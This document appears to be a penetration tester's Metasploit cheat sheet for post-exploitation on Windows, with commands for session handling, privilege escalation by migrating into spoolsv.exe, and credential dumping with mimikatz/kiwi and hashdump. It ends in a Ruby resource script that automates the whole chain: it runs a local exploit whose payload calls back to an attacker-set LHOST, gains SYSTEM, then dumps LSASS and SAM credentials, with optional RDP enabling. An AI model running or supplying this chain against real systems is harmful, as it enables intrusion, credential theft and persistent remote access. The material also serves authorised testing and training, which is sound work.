# Metasploit

* `exploit -j` (or `run -j`) runs the module as a background job; add `-z` so a new session is not auto-interacted with
* `sessions -l` lists sessions, `sessions -i 1` interacts with session 1
* `background` (or Ctrl-Z) drops from a meterpreter back to the `msf >` prompt

## Meterpreter

* [CheatSheet](https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/)
* Upgrade a plain shell session to meterpreter (`sessions -u 1` is the one-command form of the same module)

```sh
use post/multi/manage/shell_to_meterpreter
set SESSION 1
run
```

* `execute -f <program>` runs a program on the target (`shell` drops into a native shell)
* `search -f <pattern>` finds files (add `-d <dir>` to limit the search)
* `download` and `upload` transfer files

# Metasploit after gaining foothold

* A meterpreter session is open on the target. Run the local exploit suggester against it (from the meterpreter prompt as below, or from `msf >` with `use` plus `set SESSION <id>`):

```sh
run post/multi/recon/local_exploit_suggester
```

* Decide on an exploit and `background` the meterpreter.
* Use the exploit:

```sh
use 
```

* Fill in options such as `SESSION` (and `LHOST`/`LPORT` for the new payload), check them with `show options`, then run the exploit. The suggester's "appears to be vulnerable" is a heuristic check, so a candidate that fails cleanly is normal; move on to the next one.

### Privilege Escalation on Windows Using Metasploit

* Find a process running with higher privileges and migrate into it, e.g. `spoolsv.exe`, which runs as `NT AUTHORITY\SYSTEM`. Opening a SYSTEM process needs `SeDebugPrivilege`, so this only works from an elevated (high-integrity admin) session; from a medium-integrity session run a UAC bypass or a local exploit first. Check with `getuid` before and after.

```sh
migrate -N spoolsv.exe
getuid
```

* Once `NT AUTHORITY\SYSTEM` is obtained, load the kiwi (mimikatz) extension and dump all credentials. Kiwi needs the meterpreter architecture to match the OS (x64 meterpreter on x64 Windows); migrating into `spoolsv.exe`, a 64-bit process on x64 hosts, takes care of that.

```sh
load kiwi
help
creds_all
```

* Enable RDP via `run post/windows/manage/enable_rdp` (optionally `set USERNAME`/`set PASSWORD` to add a user). It changes registry and firewall settings and writes a cleanup resource script to loot; keep it for cleanup.

### Hashdump on Windows

* Meterpreter, running as SYSTEM (the SAM is not readable otherwise)

```sh
run post/windows/gather/hashdump
```

* Or through kiwi (same SYSTEM requirement)

```sh
load kiwi
lsa_dump_sam
```
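The steps above (upgrade the shell, run the suggester, run the chosen local exploit, migrate into `spoolsv.exe`, load kiwi, dump credentials) chained into one msfconsole resource script, as an added example that is not part of the original notes. The file name `postex_windows.rc` and the global `PRIVESC` variable are assumptions made here; the `<ruby>` block relies on the console's `framework` and `run_single`, and on the meterpreter session's `run_cmd`, `arch`, `sys.config.getuid` and `sys.config.sysinfo`, as they exist in current Metasploit releases. It refuses to load kiwi until the session is SYSTEM and its architecture matches the host, the two conditions that most often make `creds_all` fail.

```msf
# postex_windows.rc  (file name assumed; added example, not from the notes above)
#
# From an msf > prompt that already has a session:
#   resource postex_windows.rc                          # pass 1: upgrade shell / run suggester
#   setg PRIVESC exploit/windows/local/<chosen module>  # module name taken from the suggester output
#   setg LHOST <attacker ip>                            # needed by the local exploit's payload
#   resource postex_windows.rc                          # pass 2: privesc, migrate, dump creds
<ruby>
live      = -> { framework.sessions.select { |_, s| s.alive? } }
getuid    = ->(s) { s.sys.config.getuid.to_s }
is_system = ->(s) { getuid.call(s).upcase.include?("NT AUTHORITY\\SYSTEM") }
# kiwi needs the meterpreter arch (x86/x64) to match the OS arch reported by sysinfo
arch_ok   = ->(s) { s.arch.to_s == s.sys.config.sysinfo["Architecture"].to_s }

privesc   = framework.datastore["PRIVESC"].to_s          # set with: setg PRIVESC <module>
# prefer an existing meterpreter session, otherwise the lowest-numbered live session
sid, sess = live.call.find { |_, s| s.type == "meterpreter" } || live.call.min_by { |id, _| id }

if sess.nil?
  print_error("No live session - get a foothold first")
elsif sess.type != "meterpreter"
  # plain shell: upgrade it (one-command form of post/multi/manage/shell_to_meterpreter)
  print_status("Session #{sid} is a #{sess.type} session, upgrading to meterpreter")
  run_single("sessions -u #{sid}")
elsif privesc.empty?
  run_single("use post/multi/recon/local_exploit_suggester")
  run_single("set SESSION #{sid}")
  run_single("run")
  print_status("Choose a module, then: setg PRIVESC <module> and re-run this resource file")
else
  before = live.call.keys
  run_single("use #{privesc}")
  run_single("set SESSION #{sid}")
  run_single("exploit -j -z")                 # background job, do not auto-interact
  new_sid = nil
  30.times do                                 # wait up to ~60 s for the elevated session
    new_sid = (live.call.keys - before).first
    break if new_sid
    sleep 2
  end

  if new_sid.nil?
    print_error("#{privesc} returned no session; check its options and try the next candidate")
  else
    s = framework.sessions[new_sid]
    print_status("New session #{new_sid}: #{getuid.call(s)} (#{s.arch})")
    # spoolsv.exe runs as SYSTEM and is 64-bit on x64 Windows, so one migrate fixes both
    # privilege and arch, but only if the session's token holds SeDebugPrivilege
    s.run_cmd("migrate -N spoolsv.exe") unless is_system.call(s) && arch_ok.call(s)

    if !is_system.call(s)
      print_error("Still #{getuid.call(s)}: migrating into a SYSTEM process needs an elevated token")
    elsif !arch_ok.call(s)
      print_error("Meterpreter is #{s.arch} on a #{s.sys.config.sysinfo['Architecture']} host; migrate to a 64-bit process before loading kiwi")
    else
      s.run_cmd("load kiwi")
      s.run_cmd("creds_all")                  # logon passwords/hashes/tickets from LSASS
      s.run_cmd("lsa_dump_sam")               # local SAM hashes via LSA
      run_single("use post/windows/gather/hashdump")
      run_single("set SESSION #{new_sid}")
      run_single("run")                       # SAM hashes via the registry, saved to loot
      # run_single("use post/windows/manage/enable_rdp")  # only if RDP access is in scope
    end
  end
end
</ruby>
```

The script is deliberately two-pass: the suggester output has to be read by a person, because "appears to be vulnerable" is a check, not a guarantee, and the choice of module is the one step that should not be automated. Everything after that is mechanical, and the SYSTEM and architecture checks are what turn a silent kiwi failure into a clear message about what to fix.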